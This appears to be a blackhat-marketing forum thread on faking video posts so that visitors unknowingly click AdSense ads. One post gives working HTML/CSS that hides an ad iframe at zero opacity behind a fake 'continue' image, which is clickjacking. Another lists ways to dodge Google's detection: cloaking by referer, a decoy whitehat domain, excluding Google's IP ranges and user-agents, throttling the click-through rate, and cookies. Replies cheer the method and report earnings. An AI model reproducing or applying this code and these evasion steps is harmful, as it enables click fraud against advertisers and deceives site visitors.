Is there a way to use this in wordpress? Faking a video in a post?
haven't messed up with my wp blogs for a while now. but i think if u use iframe its possible.
Does anyone have any idea how to create a php code that say for example if the ad code is generated (after the number is randomized) then when the user clicks on the ad code it pops up the ad and THEN runs the video?
I would appreciate any help on this as Im currently stuck and cannot find a way to do it....
Im fairly new to php so please hold back on the 'idiot' calls
thanks guys!
by the way this forum rocks..
If I were to use this technique, I would use the following precautions:
1. I would use two domains; a blackhat and whitehat domain The WH domain would be a page containing a legit looking website with AdSense on it. The BH domain would contain our overlay code and would be the domain I would be "promoting" all around the 'net. Instead of putting the AdSense code on the BH domain, I would instead iframe the WH domain behind the overlay image. This way G "sees" all impressions/clicks coming from the WH domainI would also show a cloaked version of the WH page to the BH page by checking the referer on the WH domain. If the referer is that of the BH page, then return an optimized-for-AdSense version of the WH site to the BH page's iframe.
2. Keep the CTR down by only showing the overlay every so often.
3. Try as much as possible to exclude G's User-Agents and IP ranges from being shown the overlay!
4. Use cookies! Each time a visitor visits the BH domain, and the overlay is presented, a cookie would be set on the visitor's computer indicating that the overlay has been triggered. If the visitor returns to the page in the future, and they still have the cookie, then they will be shown the a real link to the video or whatever.
These methods should make it difficult for G and others to detect...
Did this method looooooong back!!! Now or later Google will find you and ban ur ass.. That's what happened with me...
never try it with googleuse other ppc company
wow...greatThis code creates an invisible iframe on your page and puts the Adsense code inside. But since the only thing inside this iframe is the Adsense code itself, how will Google know which ads to show on your page?
Here's the code:
Code:<style> iframe{ opacity: 0; border: 0px none transparent; position: absolute; top: 0px; left: 0px; height: 300px; width: 250px; filter:alpha(opacity=0); } img{ position: absolute; top: -50px; left: 0px; height: 300px; width: 250px; } </style> </head> <body> <div> <img src="http://healthcenter.uoregon.edu/images/continue.gif"/> <script type="text/javascript"><!-- google_ad_client = "pub-1234567890123456"; google_ad_width = 300; google_ad_height = 250; google_ad_format = "300x250_as"; google_ad_type = "image"; google_ad_channel = "4479800422"; //--></script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script> </div> </body>
Im using google adsense for my legit website and I dont want to ruin that by trying this method with it...
You can also combine this with http://makecash.org/100ctr/followmouse.html for even more money!
Simply wonderful!
I'm already making $$![]()